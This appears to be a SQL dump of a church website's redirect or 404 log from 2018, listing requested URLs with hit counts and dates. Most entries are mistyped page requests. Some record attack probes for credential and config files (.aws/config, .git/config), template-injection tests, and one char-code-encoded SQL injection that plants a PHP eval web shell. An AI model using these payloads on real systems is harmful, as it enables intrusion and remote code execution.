(8566, 'https://www.lifeoasisinternationalchurch.org/p', NULL, '', '', 4, 0, '2018-07-15 05:34:51', '0000-00-00 00:00:00', 301),
(8567, 'https://www.lifeoasisinternationalchurch.org/privatw', NULL, '', '', 2, 0, '2018-07-15 10:51:25', '0000-00-00 00:00:00', 301),
(8568, 'https://www.lifeoasisinternationalchurch.org/eoueuoeuoirei/blog/item/', NULL, '', '', 1, 0, '2018-07-15 13:42:24', '0000-00-00 00:00:00', 301),
(8569, 'https://www.lifeoasisinternationalchurch.org/63-day-11', NULL, '', '', 9, 0, '2018-07-16 10:27:26', '0000-00-00 00:00:00', 301),
(8570, 'https://www.dciradio.org/assets/', NULL, '', '', 1, 0, '2018-07-16 13:22:55', '0000-00-00 00:00:00', 301),
(8571, 'https://www.dciradio.org/css/', NULL, '', '', 1, 0, '2018-07-16 13:22:59', '0000-00-00 00:00:00', 301),
(8572, 'https://www.dciradio.org/font/', NULL, '', '', 1, 0, '2018-07-16 13:23:11', '0000-00-00 00:00:00', 301),
(8573, 'https://www.dciradio.org/fonts/', NULL, '', '', 1, 0, '2018-07-16 13:23:13', '0000-00-00 00:00:00', 301),
(8574, 'https://www.dciradio.org/img/', NULL, '', '', 1, 0, '2018-07-16 13:23:27', '0000-00-00 00:00:00', 301),
(8575, 'https://www.dciradio.org/js/', NULL, '', '', 1, 0, '2018-07-16 13:23:42', '0000-00-00 00:00:00', 301),
(8576, 'https://www.dciradio.org/twittercast/', NULL, '', '', 1, 0, '2018-07-16 13:24:01', '0000-00-00 00:00:00', 301),
(8577, 'https://www.lifeoasisinternationalchurch.org/dreamcentre.php', NULL, '', '', 13, 0, '2018-07-17 01:41:06', '0000-00-00 00:00:00', 301),
(8578, 'https://www.lifeoasisinternationalchurch.org/template-info/index.php?option=com_content&view=article&id=47:videos&catid=2:uncategorised&itemid=189', NULL, '', '', 1, 0, '2018-07-18 18:42:22', '0000-00-00 00:00:00', 301),
(8579, 'https://www.lifeoasisinternationalchurch.org/streaming/contact', NULL, '', '', 5, 0, '2018-07-20 00:17:16', '0000-00-00 00:00:00', 301),
(8580, 'https://www.lifeoasisinternationalchurch.org/streaming/contact.html', NULL, '', '', 5, 0, '2018-07-20 00:17:17', '0000-00-00 00:00:00', 301),
(8581, 'https://www.lifeoasisinternationalchurch.org/streaming/contactus', NULL, '', '', 5, 0, '2018-07-20 00:17:18', '0000-00-00 00:00:00', 301),
(8582, 'https://www.lifeoasisinternationalchurch.org/streaming/contact-us', NULL, '', '', 5, 0, '2018-07-20 00:17:19', '0000-00-00 00:00:00', 301),
(8583, 'https://www.lifeoasisinternationalchurch.org/streaming/contact_us', NULL, '', '', 5, 0, '2018-07-20 00:17:19', '0000-00-00 00:00:00', 301),
(8584, 'https://www.lifeoasisinternationalchurch.org/streaming/about', NULL, '', '', 5, 0, '2018-07-20 00:17:20', '0000-00-00 00:00:00', 301),
(8585, 'https://www.lifeoasisinternationalchurch.org/streaming/about.html', NULL, '', '', 5, 0, '2018-07-20 00:17:21', '0000-00-00 00:00:00', 301),
(8586, 'https://www.lifeoasisinternationalchurch.org/streaming/aboutus', NULL, '', '', 5, 0, '2018-07-20 00:17:22', '0000-00-00 00:00:00', 301),
(8587, 'https://www.lifeoasisinternationalchurch.org/streaming/about-us', NULL, '', '', 5, 0, '2018-07-20 00:17:23', '0000-00-00 00:00:00', 301),
(8588, 'https://www.lifeoasisinternationalchurch.org/streaming/about_us', NULL, '', '', 5, 0, '2018-07-20 00:17:24', '0000-00-00 00:00:00', 301),
(8589, 'https://www.lifeoasisinternationalchurch.org/streaming/company', NULL, '', '', 5, 0, '2018-07-20 00:17:25', '0000-00-00 00:00:00', 301),
(8590, 'https://www.lifeoasisinternationalchurch.org/streaming/support', NULL, '', '', 5, 0, '2018-07-20 00:17:25', '0000-00-00 00:00:00', 301),
(8591, 'https://www.lifeoasisinternationalchurch.org/streaming/help', NULL, '', '', 5, 0, '2018-07-20 00:17:26', '0000-00-00 00:00:00', 301),
(8592, 'https://142.4.21.132/nmaplowercheck1532050310', NULL, '', '', 1, 0, '2018-07-20 01:31:49', '0000-00-00 00:00:00', 301),
(8593, 'https://142.4.21.132/nmaplowercheck1532053463', NULL, '', '', 1, 0, '2018-07-20 02:24:25', '0000-00-00 00:00:00', 301),
(8594, 'https://www.lifeoasisinternationalchurch.org/component/k2/item/null', NULL, '', '', 2, 0, '2018-07-20 14:29:18', '0000-00-00 00:00:00', 301),
(8595, 'https://www.lifeoasisinternationalchurch.org/15-prayer-a-fasting-day-6', NULL, '', '', 2, 0, '2018-07-20 17:47:42', '0000-00-00 00:00:00', 301),
(8596, 'https://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/14', NULL, '', '', 2, 0, '2018-07-20 17:49:29', '0000-00-00 00:00:00', 301),
(8597, 'https://www.lifeoasisinternationalchurch.org/component/content/article/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2018-07-20 17:49:29', '0000-00-00 00:00:00', 301),
(8598, 'https://www.lifeoasisinternationalchurch.org/35thanniversary', NULL, '', '', 2, 0, '2018-07-20 19:12:51', '0000-00-00 00:00:00', 301),
(8599, 'https://lifeoasisinternationalchurch.org/backup/bitcoin/', NULL, '', '', 8, 0, '2018-07-20 19:56:56', '0000-00-00 00:00:00', 301),
(8600, 'https://lifeoasisinternationalchurch.org/connectors/system/phpthumb.php', NULL, 'lifeoasisinternationalchurch.org', '', 9, 0, '2018-07-20 20:07:23', '0000-00-00 00:00:00', 301),
(8601, 'https://www.lifeoasisinternationalchurch.org/gobcmessages', NULL, '', '', 3, 0, '2018-07-22 16:52:18', '0000-00-00 00:00:00', 301),
(8602, 'https://www.lifeoasisinternationalchurch.org/gobc/downloads', NULL, '', '', 1, 0, '2018-07-22 16:53:56', '0000-00-00 00:00:00', 301),
(8603, 'https://www.lifeoasisinternationalchurch.org/14-prayer-a-fasting-day-5', NULL, '', '', 1, 0, '2018-07-23 01:37:48', '0000-00-00 00:00:00', 301),
(8604, 'https://www.lifeoasisinternationalchurch.org/22-joomla/11-music-is-food-for-the-soul', NULL, '', '', 1, 0, '2018-07-23 13:14:12', '0000-00-00 00:00:00', 301),
(8605, 'https://www.lifeoasisinternationalchurch.org/22-joomla/8-you-only-live-once-live-well', NULL, '', '', 1, 0, '2018-07-23 14:32:39', '0000-00-00 00:00:00', 301),
(8606, 'https://www.lifeoasisinternationalchurch.org/youtube audio streaming', NULL, '', '', 3, 0, '2018-07-25 17:28:45', '0000-00-00 00:00:00', 301),
(8607, 'https://www.lifeoasisinternationalchurch.org/user/', NULL, '', '', 2, 0, '2018-07-25 21:18:23', '0000-00-00 00:00:00', 301),
(8608, 'https://lifeoasisinternationalchurch.org/programmes.php', NULL, '', '', 4, 0, '2018-07-26 00:44:52', '0000-00-00 00:00:00', 301),
(8609, 'https://www.lifeoasisinternationalchurch.org/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=114&arrs2[]=101&arrs2[]=97&arrs2[]=100&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=120&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=109&arrs2[]=79&arrs2[]=111&arrs2[]=110&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=57&arrs2[]=32&arrs2[]=35', NULL, '', '', 2, 0, '2018-07-26 07:07:05', '0000-00-00 00:00:00', 301),
(8610, 'https://www.lifeoasisinternationalchurch.org/plus/ad_js.php?aid=19', NULL, '', '', 2, 0, '2018-07-26 07:07:09', '0000-00-00 00:00:00', 301),
(8611, 'https://www.lifeoasisinternationalchurch.org/plus/read.php', NULL, '', '', 2, 0, '2018-07-26 07:07:16', '0000-00-00 00:00:00', 301),
(8612, 'https://www.lifeoasisinternationalchurch.org/da.php', NULL, 'http://www.lifeoasisinternationalchurch.org/install.php', '', 4, 0, '2018-07-26 07:08:30', '0000-00-00 00:00:00', 301),
(8613, 'https://www.lifeoasisinternationalchurch.org///index.php?option=com_easyblog&view=dashboard&layout=write', NULL, 'https://www.lifeoasisinternationalchurch.org/', '', 1, 0, '2018-07-26 13:20:05', '0000-00-00 00:00:00', 301),
(8614, 'https://www.lifeoasisinternationalchurch.org/partnership/18-loic/50-young-achievers', NULL, '', '', 3, 0, '2018-07-27 13:27:08', '0000-00-00 00:00:00', 301),
(8615, 'https://www.lifeoasisinternationalchurch.org/connectors/system/phpthumb.php', NULL, '', '', 7, 0, '2018-07-28 02:40:40', '0000-00-00 00:00:00', 301),
(8616, 'https://www.lifeoasisinternationalchurch.org/user.php?action=register', NULL, 'https://www.lifeoasisinternationalchurch.org/', '', 8, 0, '2018-07-28 16:58:12', '0000-00-00 00:00:00', 301),
(8617, 'https://www.lifeoasisinternationalchurch.org/register.php', NULL, 'https://www.lifeoasisinternationalchurch.org/', '', 9, 0, '2018-07-28 16:58:15', '0000-00-00 00:00:00', 301),
(8618, 'https://lifeoasisinternationalchurch.org/how-to-develop-and-maintain-an-effective-prayer-', NULL, '', '', 1, 0, '2018-07-29 00:30:52', '0000-00-00 00:00:00', 301),
(8619, 'https://lifeoasisinternationalchurch.org/dockerfile', NULL, '', '', 4, 0, '2018-07-30 01:55:32', '0000-00-00 00:00:00', 301),
(8620, 'https://www.lifeoasisinternationalchurch.org/dockerfile', NULL, '', '', 3, 0, '2018-07-30 01:55:35', '0000-00-00 00:00:00', 301),
(8621, 'https://www.lifeoasisinternationalchurch.org/loic/zionpillars.php', NULL, '', '', 13, 0, '2018-07-30 17:41:23', '0000-00-00 00:00:00', 301),
(8622, 'https://www.lifeoasisinternationalchurch.org/wp-login', NULL, 'https://www.lifeoasisinternationalchurch.org/wp-login', '', 1, 0, '2018-07-30 21:52:53', '0000-00-00 00:00:00', 301),
(8623, 'https://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/19-army-of-the-lord-2', NULL, '', '', 1, 0, '2018-07-31 04:06:42', '0000-00-00 00:00:00', 301),
(8624, 'https://www.lifeoasisinternationalchurch.org/index.php/component/content/article/18-loic/35-trm', NULL, '', '', 2, 0, '2018-07-31 04:31:32', '0000-00-00 00:00:00', 301),
(8625, 'https://kyfw.12306.cn/otn/leftticket/query?leftticketdto.train_date=2018-08-07&leftticketdto.from_station=szh&leftticketdto.to_station=csq&purpose_codes=adult', NULL, 'https://kyfw.12306.cn/otn/leftTicket/init', '', 1, 0, '2018-07-31 12:20:19', '0000-00-00 00:00:00', 301),
(8626, 'https://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/25689', NULL, '', '', 1, 0, '2018-08-01 12:16:31', '0000-00-00 00:00:00', 301),
(8627, 'https://lifeoasisinternationalchurch.org/.aws/config', NULL, '', '', 1, 0, '2018-08-03 01:07:40', '0000-00-00 00:00:00', 301),
(8628, 'https://www.lifeoasisinternationalchurch.org/.aws/config', NULL, '', '', 1, 0, '2018-08-03 01:07:44', '0000-00-00 00:00:00', 301),
(8629, 'https://lifeoasisinternationalchurch.org/web of wisdom 2018', NULL, '', '', 1, 0, '2018-08-03 06:23:55', '0000-00-00 00:00:00', 301),
(8630, 'https://lifeoasisinternationalchurch.org/index.php/programme/11-demo-articles/7-tutorials-and-guides', NULL, '', '', 1, 0, '2018-08-03 23:36:58', '0000-00-00 00:00:00', 301),
(8631, 'https://lifeoasisinternationalchurch.org/ private streaming', NULL, '', '', 2, 0, '2018-08-04 05:20:03', '0000-00-00 00:00:00', 301),
(8632, 'https://lifeoasisinternationalchurch.org/private strea', NULL, '', '', 2, 0, '2018-08-04 05:39:01', '0000-00-00 00:00:00', 301),
(8633, 'https://www.lifeoasisinternationalchurch.org/streaming/privateg', NULL, '', '', 1, 0, '2018-08-04 05:45:49', '0000-00-00 00:00:00', 301),
(8634, 'https://www.lifeoasisinternationalchurch.org/youtube/privatestreaming', NULL, '', '', 1, 0, '2018-08-04 06:28:46', '0000-00-00 00:00:00', 301),
(8635, 'https://www.lifeoasisinternationalchurch.org/pivatestreaming', NULL, '', '', 3, 0, '2018-08-04 06:29:13', '0000-00-00 00:00:00', 301),
(8636, 'https://www.lifeoasisinternationalchurch.org/priv/ate', NULL, '', '', 4, 0, '2018-08-04 06:53:42', '0000-00-00 00:00:00', 301),
(8637, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=pkpxgly7cj8', NULL, 'https://www.lifeoasisinternationalchurch.org/private', '', 10, 0, '2018-08-04 07:02:43', '0000-00-00 00:00:00', 301),
(8638, 'https://lifeoasisinternationalchurch.org/index.php/programme/11-demo-articles/10-preset-styles', NULL, '', '', 1, 0, '2018-08-04 11:11:49', '0000-00-00 00:00:00', 301),
(8639, 'https://lifeoasisinternationalchurch.org/specialstewardmeeting', NULL, '', '', 1, 0, '2018-08-04 15:38:18', '0000-00-00 00:00:00', 301),
(8640, 'https://lifeoasisinternationalchurch.org/stewardmeeting', NULL, '', '', 1, 0, '2018-08-04 15:38:58', '0000-00-00 00:00:00', 301),
(8641, 'https://lifeoasisinternationalchurch.org/priavate', NULL, '', '', 1, 0, '2018-08-04 18:19:42', '0000-00-00 00:00:00', 301),
(8642, 'https://lifeoasisinternationalchurch.org/stewards', NULL, '', '', 1, 0, '2018-08-04 18:56:55', '0000-00-00 00:00:00', 301),
(8643, 'https://142.4.21.132/connectors/system/phpthumb.php', NULL, '', '', 1, 0, '2018-08-04 21:20:15', '0000-00-00 00:00:00', 301),
(8644, 'https://www.lifeoasisinternationalchurch.org/traiing', NULL, '', '', 1, 0, '2018-08-05 05:27:47', '0000-00-00 00:00:00', 301),
(8645, 'https://lifeoasisinternationalchurch.org/l', NULL, '', '', 2, 0, '2018-08-05 10:43:58', '0000-00-00 00:00:00', 301),
(8646, 'https://www.lifeoasisinternationalchurch.org/component/', NULL, '', '', 1, 0, '2018-08-05 13:38:54', '0000-00-00 00:00:00', 301),
(8647, 'https://www.lifeoasisinternationalchurch.org/prayer for 2018', NULL, '', '', 1, 0, '2018-08-05 15:44:18', '0000-00-00 00:00:00', 301),
(8648, 'https://142.4.21.132/axis2/', NULL, '', '', 1, 0, '2018-08-06 01:24:06', '0000-00-00 00:00:00', 301),
(8649, 'https://142.4.21.132/hnap1/', NULL, 'https://142.4.21.132/', '', 2, 0, '2018-08-06 05:04:06', '0000-00-00 00:00:00', 301),
(8650, 'https://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/22', NULL, '', '', 2, 0, '2018-08-06 12:46:15', '0000-00-00 00:00:00', 301),
(8651, 'https://lifeoasisinternationalchurch.org/index.php/images/demo/video/envato_sting.ogv', NULL, '', '', 2, 0, '2018-08-06 13:20:19', '0000-00-00 00:00:00', 301),
(8652, 'https://www.lifeoasisinternationalchurch.org/partnership.php', NULL, '', '', 3, 0, '2018-08-06 17:18:26', '0000-00-00 00:00:00', 301),
(8653, 'https://lifeoasisinternationalchurch.org/index.php/images/demo/video/envato_sting.webm', NULL, '', '', 2, 0, '2018-08-06 18:14:44', '0000-00-00 00:00:00', 301),
(8654, 'https://lifeoasisinternationalchurch.org/index.php/images/demo/video/envato_sting.mp4', NULL, '', '', 2, 0, '2018-08-07 00:09:22', '0000-00-00 00:00:00', 301),
(8655, 'https://lifeoasisinternationalchurch.org/phpminiadmin.php', NULL, 'http://lifeoasisinternationalchurch.org/phpminiadmin.php', '', 1, 0, '2018-08-07 16:26:23', '0000-00-00 00:00:00', 301),
(8656, 'https://www.lifeoasisinternationalchurch.org/resources/vod/rev olonade', NULL, '', '', 1, 0, '2018-08-07 19:27:04', '0000-00-00 00:00:00', 301),
(8657, 'https://www.lifeoasisinternationalchurch.org/resourcelive-streaming', NULL, '', '', 2, 0, '2018-08-09 15:14:03', '0000-00-00 00:00:00', 301),
(8658, 'https://www.lifeoasisinternationalchurch.org/null', NULL, '', '', 56, 0, '2018-08-09 17:04:19', '0000-00-00 00:00:00', 301),
(8659, 'https://lifeoasisinternationalchurch.org/livestraming', NULL, '', '', 1, 0, '2018-08-12 08:19:48', '0000-00-00 00:00:00', 301),
(8660, 'https://lifeoasisinternationalchurch.org/you', NULL, '', '', 4, 0, '2018-08-15 09:54:51', '0000-00-00 00:00:00', 301),
(8661, 'https://lifeoasisinternationalchurch.org/yout', NULL, '', '', 4, 0, '2018-08-15 09:54:51', '0000-00-00 00:00:00', 301),
(8662, 'https://lifeoasisinternationalchurch.org/youtub', NULL, '', '', 4, 0, '2018-08-15 09:54:52', '0000-00-00 00:00:00', 301),
(8663, 'https://lifeoasisinternationalchurch.org/youtu', NULL, '', '', 4, 0, '2018-08-15 09:54:53', '0000-00-00 00:00:00', 301),
(8664, 'https://lifeoasisinternationalchurch.org/youty', NULL, '', '', 1, 0, '2018-08-15 18:41:03', '0000-00-00 00:00:00', 301),
(8665, 'https://lifeoasisinternationalchurch.org/youtyb', NULL, '', '', 1, 0, '2018-08-15 18:41:04', '0000-00-00 00:00:00', 301),
(8666, 'https://www.lifeoasisinternationalchurch.org/f368975e2bebc5', NULL, '', '', 1, 0, '2018-08-16 07:50:29', '0000-00-00 00:00:00', 301),
(8667, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=vuftctb8p3i', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 1, 0, '2018-08-16 15:52:22', '0000-00-00 00:00:00', 301),
(8668, 'https://142.4.21.132/nmaplowercheck1534525569', NULL, '', '', 1, 0, '2018-08-17 17:06:08', '0000-00-00 00:00:00', 301),
(8669, 'https://www.lifeoasisinternationalchurch.org/service', NULL, '', '', 2, 0, '2018-08-19 09:26:26', '0000-00-00 00:00:00', 301),
(8670, 'https://www.lifeoasisinternationalchurch.org/se', NULL, '', '', 1, 0, '2018-08-19 09:26:36', '0000-00-00 00:00:00', 301),
(8671, 'https://www.lifeoasisinternationalchurch.org/streaminf', NULL, '', '', 1, 0, '2018-08-19 09:26:40', '0000-00-00 00:00:00', 301),
(8672, 'https://www.lifeoasisinternationalchurch.org/componet/k2/item/36-scriptural-confession', NULL, '', '', 1, 0, '2018-08-20 13:17:47', '0000-00-00 00:00:00', 301),
(8673, 'https://www.lifeoasisinternationalchurch.org/prv', NULL, '', '', 1, 0, '2018-08-21 10:00:26', '0000-00-00 00:00:00', 301),
(8674, 'https://www.lifeoasisinternationalchurch.org/prva', NULL, '', '', 1, 0, '2018-08-21 10:00:27', '0000-00-00 00:00:00', 301),
(8675, 'https://www.lifeoasisinternationalchurch.org/prvat', NULL, '', '', 1, 0, '2018-08-21 10:00:27', '0000-00-00 00:00:00', 301),
(8676, 'https://www.lifeoasisinternationalchurch.org/prvate', NULL, '', '', 6, 0, '2018-08-21 10:00:27', '0000-00-00 00:00:00', 301),
(8677, 'https://www.lifeoasisinternationalchurch.org/resources/live-private', NULL, '', '', 1, 0, '2018-08-21 10:05:36', '0000-00-00 00:00:00', 301),
(8678, 'https://www.lifeoasisinternationalchurch.org/resources/pr', NULL, '', '', 1, 0, '2018-08-21 11:24:10', '0000-00-00 00:00:00', 301),
(8679, 'https://www.lifeoasisinternationalchurch.org/privste', NULL, '', '', 2, 0, '2018-08-21 12:02:59', '0000-00-00 00:00:00', 301),
(8680, 'https://142.4.21.132:443/.git/config', NULL, '', '', 1, 0, '2018-08-21 20:52:05', '0000-00-00 00:00:00', 301),
(8681, 'https://lifeoasisinternationalchurch.org/component/users/?view=register', NULL, '', '', 148, 0, '2018-08-23 10:51:55', '0000-00-00 00:00:00', 301),
(8682, 'https://www.lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/images/demo/video/envato_sting.mp4', NULL, '', '', 2, 0, '2018-08-23 13:16:41', '0000-00-00 00:00:00', 301),
(8683, 'https://142.4.21.132:443//a2billing/admin/public/index.php', NULL, '', '', 1, 0, '2018-08-23 19:46:40', '0000-00-00 00:00:00', 301),
(8684, 'https://www.lifeoasisinternationalchurch.org/${222+222038492}/branches', NULL, 'https://www.lifeoasisinternationalchurch.org/${222+222038492}/branches', '', 1, 0, '2018-08-25 02:33:01', '0000-00-00 00:00:00', 301),
(8685, 'https://www.lifeoasisinternationalchurch.org/index.php/${222+222038492}/branches', NULL, 'https://www.lifeoasisinternationalchurch.org/index.php/${222+222038492}/branches', '', 1, 0, '2018-08-25 02:33:02', '0000-00-00 00:00:00', 301),
(8686, 'https://lifeoasisinternationalchurch.org/${222+222038492}/ordained', NULL, 'https://lifeoasisinternationalchurch.org/${222+222038492}/ordained', '', 1, 0, '2018-08-25 02:34:09', '0000-00-00 00:00:00', 301),
(8687, 'https://lifeoasisinternationalchurch.org/about-us/${222+222038492}/ordained', NULL, 'https://lifeoasisinternationalchurch.org/about-us/${222+222038492}/ordained', '', 1, 0, '2018-08-25 02:34:10', '0000-00-00 00:00:00', 301),
(8688, 'https://www.lifeoasisinternationalchurch.org/${222+222038492}/broadcast-schedule', NULL, 'https://www.lifeoasisinternationalchurch.org/${222+222038492}/broadcast-schedule', '', 1, 0, '2018-08-25 02:38:16', '0000-00-00 00:00:00', 301),
(8689, 'https://www.lifeoasisinternationalchurch.org/resources/${222+222038492}/broadcast-schedule', NULL, 'https://www.lifeoasisinternationalchurch.org/resources/${222+222038492}/broadcast-schedule', '', 1, 0, '2018-08-25 02:38:17', '0000-00-00 00:00:00', 301),
(8690, 'https://lifeoasisinternationalchurch.org/${222+222038492}/downloads?download=38:kingdom-leadership-studies-publication-6th-august-2017', NULL, 'https://lifeoasisinternationalchurch.org/${222+222038492}/downloads?download=38:kingdom-leadership-studies-publication-6th-august-2017', '', 1, 0, '2018-08-25 02:47:15', '0000-00-00 00:00:00', 301),
(8691, 'https://lifeoasisinternationalchurch.org/resources/${222+222038492}/downloads?download=38:kingdom-leadership-studies-publication-6th-august-2017', NULL, 'https://lifeoasisinternationalchurch.org/resources/${222+222038492}/downloads?download=38:kingdom-leadership-studies-publication-6th-august-2017', '', 1, 0, '2018-08-25 02:47:16', '0000-00-00 00:00:00', 301),
(8692, 'https://www.lifeoasisinternationalchurch.org/${222+222038492}/downloads?download=7:victory-celebration-service-01-01-2017', NULL, 'https://www.lifeoasisinternationalchurch.org/${222+222038492}/downloads?download=7:victory-celebration-service-01-01-2017', '', 1, 0, '2018-08-25 02:53:25', '0000-00-00 00:00:00', 301),
(8693, 'https://www.lifeoasisinternationalchurch.org/resources/${222+222038492}/downloads?download=7:victory-celebration-service-01-01-2017', NULL, 'https://www.lifeoasisinternationalchurch.org/resources/${222+222038492}/downloads?download=7:victory-celebration-service-01-01-2017', '', 1, 0, '2018-08-25 02:53:27', '0000-00-00 00:00:00', 301),
(8694, 'https://lifeoasisinternationalchurch.org/${222+222038492}/users?view=reset&itemid=101', NULL, 'https://lifeoasisinternationalchurch.org/${222+222038492}/users?view=reset&Itemid=101', '', 1, 0, '2018-08-25 02:58:48', '0000-00-00 00:00:00', 301),
(8695, 'https://lifeoasisinternationalchurch.org/component/${222+222038492}/users?view=reset&itemid=101', NULL, 'https://lifeoasisinternationalchurch.org/component/${222+222038492}/users?view=reset&Itemid=101', '', 1, 0, '2018-08-25 02:58:49', '0000-00-00 00:00:00', 301),
(8696, 'https://www.lifeoasisinternationalchurch.org/${222+222038492}/users?view=reset&itemid=101', NULL, 'https://www.lifeoasisinternationalchurch.org/${222+222038492}/users?view=reset&Itemid=101', '', 1, 0, '2018-08-25 03:06:04', '0000-00-00 00:00:00', 301),
(8697, 'https://www.lifeoasisinternationalchurch.org/component/${222+222038492}/users?view=reset&itemid=101', NULL, 'https://www.lifeoasisinternationalchurch.org/component/${222+222038492}/users?view=reset&Itemid=101', '', 1, 0, '2018-08-25 03:06:05', '0000-00-00 00:00:00', 301),
(8698, 'https://lifeoasisinternationalchurch.org/${222+222038492}/index.php?option=com_roksprocket&amp', NULL, 'https://lifeoasisinternationalchurch.org/${222+222038492}/index.php?option=com_roksprocket&amp', '', 1, 0, '2018-08-25 03:12:26', '0000-00-00 00:00:00', 301),
(8699, 'https://www.lifeoasisinternationalchurch.org//xmlrpc.php', NULL, 'http://www.google.com.hk', '', 3, 0, '2018-08-25 06:58:32', '0000-00-00 00:00:00', 301),
(8700, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=nvqgu--in4q', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 2, 0, '2018-08-26 21:01:43', '0000-00-00 00:00:00', 301),
(8701, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=47:videos&catid=2:uncategorised&itemid=189', NULL, '', '', 2, 0, '2018-08-26 23:46:10', '0000-00-00 00:00:00', 301),
(8702, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=zqh0ds8ehx4', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 3, 0, '2018-08-27 16:18:24', '0000-00-00 00:00:00', 301),
(8703, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=fds9hq1acky', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 4, 0, '2018-08-27 16:21:35', '0000-00-00 00:00:00', 301),
(8704, 'https://lifeoasisinternationalchurch.org/sr', NULL, '', '', 1, 0, '2018-08-30 11:04:31', '0000-00-00 00:00:00', 301),
(8705, 'https://lifeoasisinternationalchurch.org/resources/traning', NULL, '', '', 1, 0, '2018-08-31 23:10:02', '0000-00-00 00:00:00', 301),
(8706, 'https://www.lifeoasisinternationalchurch.org/women meeting', NULL, '', '', 1, 0, '2018-09-01 05:02:59', '0000-00-00 00:00:00', 301),
(8707, 'https://www.lifeoasisinternationalchurch.org/priv', NULL, '', '', 2, 0, '2018-09-01 05:20:49', '0000-00-00 00:00:00', 301),
(8708, 'https://www.lifeoasisinternationalchurch.org/privatest', NULL, '', '', 1, 0, '2018-09-01 05:20:57', '0000-00-00 00:00:00', 301),
(8709, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=li8-ci18big', NULL, 'https://www.lifeoasisinternationalchurch.org/private', '', 14, 0, '2018-09-01 07:35:57', '0000-00-00 00:00:00', 301),
(8710, 'https://lifeoasisinternationalchurch.org/xmlrpc.php', NULL, '', '', 112, 0, '2018-09-01 10:08:31', '0000-00-00 00:00:00', 301),
(8711, 'https://lifeoasisinternationalchurch.org/streaminh', NULL, '', '', 2, 0, '2018-09-02 06:33:47', '0000-00-00 00:00:00', 301),
(8712, 'https://lifeoasisinternationalchurch.org/lifestream', NULL, '', '', 5, 0, '2018-09-02 07:45:40', '0000-00-00 00:00:00', 301),
(8713, 'https://www.lifeoasisinternationalchurch.org/payments', NULL, '', '', 1, 0, '2018-09-02 10:05:15', '0000-00-00 00:00:00', 301),
(8714, 'https://www.lifeoasisinternationalchurch.org/?itemid=1000', NULL, '', '', 1137, 0, '2018-09-03 15:25:07', '0000-00-00 00:00:00', 301),
(8715, 'https://lifeoasisinternationalchurch.org/19-prayer-a-fasting-day-10', NULL, '', '', 5, 0, '2018-09-04 01:12:43', '0000-00-00 00:00:00', 301),
(8716, 'https://www.lifeoasisinternationalchurch.org/resources/vod', NULL, '', '', 209, 0, '2018-09-04 20:00:39', '0000-00-00 00:00:00', 301),
(8717, 'https://lifeoasisinternationalchurch.org/jsspwned.php', NULL, '', '', 4, 0, '2018-09-05 03:54:42', '0000-00-00 00:00:00', 301),
(8718, 'https://mail.lifeoasisinternationalchurch.org/?itemid=1000', NULL, '', '', 2, 0, '2018-09-05 07:08:49', '0000-00-00 00:00:00', 301),
